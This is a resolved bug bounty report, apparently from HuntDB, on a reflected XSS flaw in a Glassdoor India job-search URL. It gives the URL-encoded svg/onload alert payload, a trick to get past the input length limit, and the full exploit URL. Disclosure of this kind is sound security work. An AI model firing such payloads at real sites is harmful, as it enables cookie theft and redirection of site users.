Loading HuntDB...

Reflected XSS at https://www.glassdoor.co.in/Job/pratt-whitney-jobs-SRCH_KE0,13.htm?initiatedFromCountryPicker=true&countryRedirect=true

Medium
G
Glassdoor
Submitted None
Reported by n1xk_10

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Reflected
Summary: There is a reflected XSS vulnerability in https://www.glassdoor.co.in/Job/pratt-whitney-jobs-SRCH_KE0,13.htm?initiatedFromCountryPicker=true&countryRedirect=true Vulnerability Type: Reflected XSS Browsers tested: Chrome, Firefox Payload: %22%3cimg%20src%3dx%20onerro%3d%3e%3csvg%20onload%3dalert%281%29%3e Steps To Reproduce: 1. Navigate to https://www.glassdoor.co.in/Job/pratt-whitney-jobs-SRCH_KE0,13.htm?initiatedFromCountryPicker=true&countryRedirect=true 2. /Job/[INPUT]pratt-whitney-jobs-SRCH_KE0,13.htm? if we input any value in the path then it is reflected on the page. Enter this payload here: %22%3cimg%20src%3dx%20onerro%3d%3e%3csvg%20onload%3dalert%281%29%3e 3. But there is a character length limitation to the input. 4. /Job/pratt-whitney-jobs-SRCH_KE0,[This value].htm? We can bypass the character limitation by changing this value 5. Now change this value from 13 to 50 6. Now open this url: https://www.glassdoor.co.in/Job/%22%3cimg%20src%3dx%20onerro%3d%3e%3csvg%20onload%3dalert%281%29%3epratt-whitney-jobs-SRCH_KE0,50.htm?initiatedFromCountryPicker=true&countryRedirect=true See the response in browser, an alert will pop up ## Impact Using XSS an attacker can steals the victim cookie and can also redirect him to a malicious site controlled by the attacker.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-site Scripting (XSS) - Reflected